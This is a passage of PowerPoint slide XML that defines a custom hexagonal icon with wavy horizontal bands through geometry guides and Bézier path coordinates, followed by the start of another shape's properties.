                  <a:gd name="connsiteY63" fmla="*/ 144618 h 381000"/>
                  <a:gd name="connsiteX64" fmla="*/ 171148 w 342899"/>
                  <a:gd name="connsiteY64" fmla="*/ 136112 h 381000"/>
                  <a:gd name="connsiteX65" fmla="*/ 149362 w 342899"/>
                  <a:gd name="connsiteY65" fmla="*/ 144675 h 381000"/>
                  <a:gd name="connsiteX66" fmla="*/ 148656 w 342899"/>
                  <a:gd name="connsiteY66" fmla="*/ 145180 h 381000"/>
                  <a:gd name="connsiteX67" fmla="*/ 115134 w 342899"/>
                  <a:gd name="connsiteY67" fmla="*/ 157582 h 381000"/>
                  <a:gd name="connsiteX68" fmla="*/ 79752 w 342899"/>
                  <a:gd name="connsiteY68" fmla="*/ 144628 h 381000"/>
                  <a:gd name="connsiteX69" fmla="*/ 59121 w 342899"/>
                  <a:gd name="connsiteY69" fmla="*/ 136112 h 381000"/>
                  <a:gd name="connsiteX70" fmla="*/ 41502 w 342899"/>
                  <a:gd name="connsiteY70" fmla="*/ 142989 h 381000"/>
                  <a:gd name="connsiteX71" fmla="*/ 39065 w 342899"/>
                  <a:gd name="connsiteY71" fmla="*/ 144999 h 381000"/>
                  <a:gd name="connsiteX72" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY72" fmla="*/ 155534 h 381000"/>
                  <a:gd name="connsiteX73" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY73" fmla="*/ 250050 h 381000"/>
                  <a:gd name="connsiteX74" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY74" fmla="*/ 217046 h 381000"/>
                  <a:gd name="connsiteX75" fmla="*/ 39065 w 342899"/>
                  <a:gd name="connsiteY75" fmla="*/ 206512 h 381000"/>
                  <a:gd name="connsiteX76" fmla="*/ 41502 w 342899"/>
                  <a:gd name="connsiteY76" fmla="*/ 204492 h 381000"/>
                  <a:gd name="connsiteX77" fmla="*/ 59121 w 342899"/>
                  <a:gd name="connsiteY77" fmla="*/ 197615 h 381000"/>
                  <a:gd name="connsiteX78" fmla="*/ 79752 w 342899"/>
                  <a:gd name="connsiteY78" fmla="*/ 206140 h 381000"/>
                  <a:gd name="connsiteX79" fmla="*/ 115134 w 342899"/>
                  <a:gd name="connsiteY79" fmla="*/ 219084 h 381000"/>
                  <a:gd name="connsiteX80" fmla="*/ 148656 w 342899"/>
                  <a:gd name="connsiteY80" fmla="*/ 206683 h 381000"/>
                  <a:gd name="connsiteX81" fmla="*/ 149362 w 342899"/>
                  <a:gd name="connsiteY81" fmla="*/ 206188 h 381000"/>
                  <a:gd name="connsiteX82" fmla="*/ 171148 w 342899"/>
                  <a:gd name="connsiteY82" fmla="*/ 197615 h 381000"/>
                  <a:gd name="connsiteX83" fmla="*/ 192020 w 342899"/>
                  <a:gd name="connsiteY83" fmla="*/ 206130 h 381000"/>
                  <a:gd name="connsiteX84" fmla="*/ 192042 w 342899"/>
                  <a:gd name="connsiteY84" fmla="*/ 206140 h 381000"/>
                  <a:gd name="connsiteX85" fmla="*/ 227364 w 342899"/>
                  <a:gd name="connsiteY85" fmla="*/ 219084 h 381000"/>
                  <a:gd name="connsiteX86" fmla="*/ 261976 w 342899"/>
                  <a:gd name="connsiteY86" fmla="*/ 206378 h 381000"/>
                  <a:gd name="connsiteX87" fmla="*/ 262005 w 342899"/>
                  <a:gd name="connsiteY87" fmla="*/ 206359 h 381000"/>
                  <a:gd name="connsiteX88" fmla="*/ 283594 w 342899"/>
                  <a:gd name="connsiteY88" fmla="*/ 197615 h 381000"/>
                  <a:gd name="connsiteX89" fmla="*/ 300709 w 342899"/>
                  <a:gd name="connsiteY89" fmla="*/ 204283 h 381000"/>
                  <a:gd name="connsiteX90" fmla="*/ 303462 w 342899"/>
                  <a:gd name="connsiteY90" fmla="*/ 206426 h 381000"/>
                  <a:gd name="connsiteX91" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY91" fmla="*/ 216894 h 381000"/>
                  <a:gd name="connsiteX92" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY92" fmla="*/ 250231 h 381000"/>
                  <a:gd name="connsiteX93" fmla="*/ 319046 w 342899"/>
                  <a:gd name="connsiteY93" fmla="*/ 250060 h 381000"/>
                  <a:gd name="connsiteX94" fmla="*/ 314937 w 342899"/>
                  <a:gd name="connsiteY94" fmla="*/ 246907 h 381000"/>
                  <a:gd name="connsiteX95" fmla="*/ 282757 w 342899"/>
                  <a:gd name="connsiteY95" fmla="*/ 235477 h 381000"/>
                  <a:gd name="connsiteX96" fmla="*/ 248683 w 342899"/>
                  <a:gd name="connsiteY96" fmla="*/ 248326 h 381000"/>
                  <a:gd name="connsiteX97" fmla="*/ 248342 w 342899"/>
                  <a:gd name="connsiteY97" fmla="*/ 248564 h 381000"/>
                  <a:gd name="connsiteX98" fmla="*/ 226961 w 342899"/>
                  <a:gd name="connsiteY98" fmla="*/ 256937 h 381000"/>
                  <a:gd name="connsiteX99" fmla="*/ 206292 w 342899"/>
                  <a:gd name="connsiteY99" fmla="*/ 248784 h 381000"/>
                  <a:gd name="connsiteX100" fmla="*/ 206015 w 342899"/>
                  <a:gd name="connsiteY100" fmla="*/ 248574 h 381000"/>
                  <a:gd name="connsiteX101" fmla="*/ 171148 w 342899"/>
                  <a:gd name="connsiteY101" fmla="*/ 235468 h 381000"/>
                  <a:gd name="connsiteX102" fmla="*/ 135736 w 342899"/>
                  <a:gd name="connsiteY102" fmla="*/ 248364 h 381000"/>
                  <a:gd name="connsiteX103" fmla="*/ 115134 w 342899"/>
                  <a:gd name="connsiteY103" fmla="*/ 256937 h 381000"/>
                  <a:gd name="connsiteX104" fmla="*/ 93512 w 342899"/>
                  <a:gd name="connsiteY104" fmla="*/ 248412 h 381000"/>
                  <a:gd name="connsiteX105" fmla="*/ 92915 w 342899"/>
                  <a:gd name="connsiteY105" fmla="*/ 247983 h 381000"/>
                  <a:gd name="connsiteX106" fmla="*/ 59120 w 342899"/>
                  <a:gd name="connsiteY106" fmla="*/ 235468 h 381000"/>
                  <a:gd name="connsiteX107" fmla="*/ 26769 w 342899"/>
                  <a:gd name="connsiteY107" fmla="*/ 247507 h 381000"/>
                  <a:gd name="connsiteX108" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY108" fmla="*/ 250050 h 381000"/>
                  <a:gd name="connsiteX109" fmla="*/ 28418 w 342899"/>
                  <a:gd name="connsiteY109" fmla="*/ 275958 h 381000"/>
                  <a:gd name="connsiteX110" fmla="*/ 36630 w 342899"/>
                  <a:gd name="connsiteY110" fmla="*/ 283445 h 381000"/>
                  <a:gd name="connsiteX111" fmla="*/ 158453 w 342899"/>
                  <a:gd name="connsiteY111" fmla="*/ 353854 h 381000"/>
                  <a:gd name="connsiteX112" fmla="*/ 184448 w 342899"/>
                  <a:gd name="connsiteY112" fmla="*/ 353854 h 381000"/>
                  <a:gd name="connsiteX113" fmla="*/ 306271 w 342899"/>
                  <a:gd name="connsiteY113" fmla="*/ 283445 h 381000"/>
                  <a:gd name="connsiteX114" fmla="*/ 314552 w 342899"/>
                  <a:gd name="connsiteY114" fmla="*/ 275863 h 381000"/>
                  <a:gd name="connsiteX115" fmla="*/ 303462 w 342899"/>
                  <a:gd name="connsiteY115" fmla="*/ 267938 h 381000"/>
                  <a:gd name="connsiteX116" fmla="*/ 300709 w 342899"/>
                  <a:gd name="connsiteY116" fmla="*/ 265795 h 381000"/>
                  <a:gd name="connsiteX117" fmla="*/ 283594 w 342899"/>
                  <a:gd name="connsiteY117" fmla="*/ 259118 h 381000"/>
                  <a:gd name="connsiteX118" fmla="*/ 262005 w 342899"/>
                  <a:gd name="connsiteY118" fmla="*/ 267872 h 381000"/>
                  <a:gd name="connsiteX119" fmla="*/ 261976 w 342899"/>
                  <a:gd name="connsiteY119" fmla="*/ 267891 h 381000"/>
                  <a:gd name="connsiteX120" fmla="*/ 227364 w 342899"/>
                  <a:gd name="connsiteY120" fmla="*/ 280597 h 381000"/>
                  <a:gd name="connsiteX121" fmla="*/ 192042 w 342899"/>
                  <a:gd name="connsiteY121" fmla="*/ 267652 h 381000"/>
                  <a:gd name="connsiteX122" fmla="*/ 192020 w 342899"/>
                  <a:gd name="connsiteY122" fmla="*/ 267633 h 381000"/>
                  <a:gd name="connsiteX123" fmla="*/ 171148 w 342899"/>
                  <a:gd name="connsiteY123" fmla="*/ 259128 h 381000"/>
                  <a:gd name="connsiteX124" fmla="*/ 149362 w 342899"/>
                  <a:gd name="connsiteY124" fmla="*/ 267700 h 381000"/>
                  <a:gd name="connsiteX125" fmla="*/ 148656 w 342899"/>
                  <a:gd name="connsiteY125" fmla="*/ 268195 h 381000"/>
                  <a:gd name="connsiteX126" fmla="*/ 115134 w 342899"/>
                  <a:gd name="connsiteY126" fmla="*/ 280597 h 381000"/>
                  <a:gd name="connsiteX127" fmla="*/ 79752 w 342899"/>
                  <a:gd name="connsiteY127" fmla="*/ 267652 h 381000"/>
                  <a:gd name="connsiteX128" fmla="*/ 59121 w 342899"/>
                  <a:gd name="connsiteY128" fmla="*/ 259128 h 381000"/>
                  <a:gd name="connsiteX129" fmla="*/ 41502 w 342899"/>
                  <a:gd name="connsiteY129" fmla="*/ 266005 h 381000"/>
                  <a:gd name="connsiteX130" fmla="*/ 39067 w 342899"/>
                  <a:gd name="connsiteY130" fmla="*/ 268015 h 381000"/>
                  <a:gd name="connsiteX131" fmla="*/ 28418 w 342899"/>
                  <a:gd name="connsiteY131" fmla="*/ 27595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42899" h="381000">
                    <a:moveTo>
                      <a:pt x="196264" y="6658"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="180909" y="-2219"/>
                      <a:pt x="161992" y="-2219"/>
                      <a:pt x="146636" y="6658"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24814" y="77067"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9459" y="85944"/>
                      <a:pt x="0" y="102346"/>
                      <a:pt x="0" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="278663"/>
                      <a:pt x="9459" y="295065"/>
                      <a:pt x="24814" y="303933"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="146636" y="374342"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="161992" y="383219"/>
                      <a:pt x="180909" y="383219"/>
                      <a:pt x="196264" y="374342"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="318086" y="303933"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="333442" y="295065"/>
                      <a:pt x="342900" y="278663"/>
                      <a:pt x="342900" y="260909"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="342900" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="342900" y="102346"/>
                      <a:pt x="333442" y="85944"/>
                      <a:pt x="318086" y="77067"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="196264" y="6658"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="158453" y="27146"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="166496" y="22498"/>
                      <a:pt x="176405" y="22498"/>
                      <a:pt x="184448" y="27146"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="306271" y="97555"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="314314" y="102203"/>
                      <a:pt x="319268" y="110795"/>
                      <a:pt x="319268" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319268" y="127216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319046" y="127044"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="317790" y="126063"/>
                      <a:pt x="316435" y="125016"/>
                      <a:pt x="314937" y="123882"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="307435" y="118224"/>
                      <a:pt x="297543" y="111938"/>
                      <a:pt x="282757" y="112462"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="265943" y="113052"/>
                      <a:pt x="256217" y="119958"/>
                      <a:pt x="248683" y="125301"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="248342" y="125549"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="241395" y="130473"/>
                      <a:pt x="236571" y="133760"/>
                      <a:pt x="226961" y="133922"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="217434" y="134083"/>
                      <a:pt x="213013" y="130864"/>
                      <a:pt x="206292" y="125759"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="206015" y="125549"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="198565" y="119901"/>
                      <a:pt x="188753" y="112452"/>
                      <a:pt x="171148" y="112452"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154014" y="112452"/>
                      <a:pt x="143607" y="119786"/>
                      <a:pt x="135736" y="125349"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128106" y="130740"/>
                      <a:pt x="123452" y="133922"/>
                      <a:pt x="115134" y="133922"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105719" y="133922"/>
                      <a:pt x="100683" y="130540"/>
                      <a:pt x="93512" y="125397"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="92915" y="124968"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="85435" y="119596"/>
                      <a:pt x="75482" y="112452"/>
                      <a:pt x="59120" y="112452"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43648" y="112452"/>
                      <a:pt x="34122" y="118624"/>
                      <a:pt x="26769" y="124492"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25634" y="125397"/>
                      <a:pt x="24596" y="126244"/>
                      <a:pt x="23632" y="127035"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23632" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23632" y="110795"/>
                      <a:pt x="28587" y="102203"/>
                      <a:pt x="36630" y="97555"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="158453" y="27146"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23632" y="155534"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23632" y="188538"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="24596" y="187747"/>
                      <a:pt x="25634" y="186909"/>
                      <a:pt x="26769" y="185995"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34122" y="180127"/>
                      <a:pt x="43648" y="173965"/>
                      <a:pt x="59120" y="173965"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75482" y="173965"/>
                      <a:pt x="85435" y="181108"/>
                      <a:pt x="92915" y="186481"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="93512" y="186909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100683" y="192043"/>
                      <a:pt x="105719" y="195424"/>
                      <a:pt x="115134" y="195424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123452" y="195424"/>
                      <a:pt x="128106" y="192253"/>
                      <a:pt x="135736" y="186861"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143607" y="181299"/>
                      <a:pt x="154014" y="173965"/>
                      <a:pt x="171148" y="173965"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188753" y="173965"/>
                      <a:pt x="198565" y="181404"/>
                      <a:pt x="206015" y="187061"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="206292" y="187271"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="213013" y="192367"/>
                      <a:pt x="217434" y="195596"/>
                      <a:pt x="226961" y="195434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236571" y="195263"/>
                      <a:pt x="241395" y="191986"/>
                      <a:pt x="248342" y="187061"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="248683" y="186814"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="256217" y="181470"/>
                      <a:pt x="265943" y="174565"/>
                      <a:pt x="282757" y="173965"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="297543" y="173441"/>
                      <a:pt x="307435" y="179727"/>
                      <a:pt x="314937" y="185395"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="316435" y="186528"/>
                      <a:pt x="317790" y="187576"/>
                      <a:pt x="319045" y="188547"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319268" y="188719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319268" y="155391"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="312796" y="152286"/>
                      <a:pt x="307519" y="148123"/>
                      <a:pt x="303462" y="144913"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302471" y="144132"/>
                      <a:pt x="301553" y="143408"/>
                      <a:pt x="300709" y="142770"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="294744" y="138274"/>
                      <a:pt x="290276" y="135865"/>
                      <a:pt x="283594" y="136103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="273929" y="136446"/>
                      <a:pt x="269060" y="139846"/>
                      <a:pt x="262005" y="144847"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="261976" y="144875"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="254291" y="150324"/>
                      <a:pt x="244479" y="157286"/>
                      <a:pt x="227364" y="157572"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209504" y="157877"/>
                      <a:pt x="199622" y="150381"/>
                      <a:pt x="192042" y="144637"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="192020" y="144618"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="185201" y="139446"/>
                      <a:pt x="180731" y="136112"/>
                      <a:pt x="171148" y="136112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161869" y="136112"/>
                      <a:pt x="156685" y="139503"/>
                      <a:pt x="149362" y="144675"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="148656" y="145180"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="141166" y="150476"/>
                      <a:pt x="131142" y="157582"/>
                      <a:pt x="115134" y="157582"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97821" y="157582"/>
                      <a:pt x="87554" y="150228"/>
                      <a:pt x="79752" y="144628"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72326" y="139313"/>
                      <a:pt x="67728" y="136112"/>
                      <a:pt x="59121" y="136112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51177" y="136112"/>
                      <a:pt x="46767" y="138789"/>
                      <a:pt x="41502" y="142989"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40754" y="143580"/>
                      <a:pt x="39942" y="144266"/>
                      <a:pt x="39065" y="144999"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35256" y="148190"/>
                      <a:pt x="30199" y="152419"/>
                      <a:pt x="23632" y="155534"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23632" y="250050"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23632" y="217046"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="30199" y="213931"/>
                      <a:pt x="35256" y="209693"/>
                      <a:pt x="39065" y="206512"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39941" y="205769"/>
                      <a:pt x="40755" y="205092"/>
                      <a:pt x="41502" y="204492"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46767" y="200292"/>
                      <a:pt x="51177" y="197615"/>
                      <a:pt x="59121" y="197615"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67728" y="197615"/>
                      <a:pt x="72326" y="200816"/>
                      <a:pt x="79752" y="206140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87554" y="211731"/>
                      <a:pt x="97821" y="219084"/>
                      <a:pt x="115134" y="219084"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131142" y="219084"/>
                      <a:pt x="141166" y="211988"/>
                      <a:pt x="148656" y="206683"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="149362" y="206188"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="156685" y="201016"/>
                      <a:pt x="161869" y="197615"/>
                      <a:pt x="171148" y="197615"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="180731" y="197615"/>
                      <a:pt x="185201" y="200958"/>
                      <a:pt x="192020" y="206130"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="192042" y="206140"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="199622" y="211893"/>
                      <a:pt x="209504" y="219389"/>
                      <a:pt x="227364" y="219084"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="244479" y="218789"/>
                      <a:pt x="254291" y="211836"/>
                      <a:pt x="261976" y="206378"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="262005" y="206359"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="269060" y="201359"/>
                      <a:pt x="273929" y="197958"/>
                      <a:pt x="283594" y="197615"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="290276" y="197377"/>
                      <a:pt x="294744" y="199777"/>
                      <a:pt x="300709" y="204283"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="301553" y="204921"/>
                      <a:pt x="302471" y="205645"/>
                      <a:pt x="303462" y="206426"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="307519" y="209626"/>
                      <a:pt x="312796" y="213798"/>
                      <a:pt x="319268" y="216894"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319268" y="250231"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="319194" y="250174"/>
                      <a:pt x="319121" y="250117"/>
                      <a:pt x="319046" y="250060"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="317791" y="249088"/>
                      <a:pt x="316435" y="248031"/>
                      <a:pt x="314937" y="246907"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="307435" y="241240"/>
                      <a:pt x="297543" y="234953"/>
                      <a:pt x="282757" y="235477"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="265943" y="236077"/>
                      <a:pt x="256217" y="242973"/>
                      <a:pt x="248683" y="248326"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="248342" y="248564"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="241395" y="253498"/>
                      <a:pt x="236571" y="256775"/>
                      <a:pt x="226961" y="256937"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="217434" y="257099"/>
                      <a:pt x="213013" y="253879"/>
                      <a:pt x="206292" y="248784"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="206015" y="248574"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="198565" y="242916"/>
                      <a:pt x="188753" y="235468"/>
                      <a:pt x="171148" y="235468"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154014" y="235468"/>
                      <a:pt x="143607" y="242811"/>
                      <a:pt x="135736" y="248364"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128106" y="253755"/>
                      <a:pt x="123452" y="256937"/>
                      <a:pt x="115134" y="256937"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105719" y="256937"/>
                      <a:pt x="100683" y="253555"/>
                      <a:pt x="93512" y="248412"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="92915" y="247983"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="85435" y="242621"/>
                      <a:pt x="75482" y="235468"/>
                      <a:pt x="59120" y="235468"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43648" y="235468"/>
                      <a:pt x="34122" y="241640"/>
                      <a:pt x="26769" y="247507"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25634" y="248412"/>
                      <a:pt x="24596" y="249260"/>
                      <a:pt x="23632" y="250050"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="28418" y="275958"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30550" y="278968"/>
                      <a:pt x="33330" y="281540"/>
                      <a:pt x="36630" y="283445"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="158453" y="353854"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="166496" y="358502"/>
                      <a:pt x="176405" y="358502"/>
                      <a:pt x="184448" y="353854"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="306271" y="283445"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="309607" y="281521"/>
                      <a:pt x="312411" y="278911"/>
                      <a:pt x="314552" y="275863"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="310184" y="273244"/>
                      <a:pt x="306485" y="270319"/>
                      <a:pt x="303462" y="267938"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302471" y="267157"/>
                      <a:pt x="301553" y="266433"/>
                      <a:pt x="300709" y="265795"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="294744" y="261290"/>
                      <a:pt x="290276" y="258880"/>
                      <a:pt x="283594" y="259118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="273929" y="259461"/>
                      <a:pt x="269060" y="262861"/>
                      <a:pt x="262005" y="267872"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="261976" y="267891"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="254291" y="273339"/>
                      <a:pt x="244479" y="280302"/>
                      <a:pt x="227364" y="280597"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209504" y="280902"/>
                      <a:pt x="199622" y="273406"/>
                      <a:pt x="192042" y="267652"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="192020" y="267633"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="185201" y="262461"/>
                      <a:pt x="180731" y="259128"/>
                      <a:pt x="171148" y="259128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161869" y="259128"/>
                      <a:pt x="156685" y="262528"/>
                      <a:pt x="149362" y="267700"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="148656" y="268195"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="141166" y="273501"/>
                      <a:pt x="131142" y="280597"/>
                      <a:pt x="115134" y="280597"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97821" y="280597"/>
                      <a:pt x="87554" y="273244"/>
                      <a:pt x="79752" y="267652"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72326" y="262328"/>
                      <a:pt x="67728" y="259128"/>
                      <a:pt x="59121" y="259128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51177" y="259128"/>
                      <a:pt x="46767" y="261804"/>
                      <a:pt x="41502" y="266005"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40755" y="266605"/>
                      <a:pt x="39943" y="267281"/>
                      <a:pt x="39067" y="268015"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36240" y="270377"/>
                      <a:pt x="32725" y="273320"/>
                      <a:pt x="28418" y="27595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2EE055EA-6CF8-BCB2-945F-498D5E3A55A4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10417279" y="2990640"/>
                <a:ext cx="971581" cy="1079534"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 196264 w 342900"/>
                  <a:gd name="connsiteY0" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX1" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY1" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX2" fmla="*/ 24814 w 342900"/>
                  <a:gd name="connsiteY2" fmla="*/ 77067 h 381000"/>
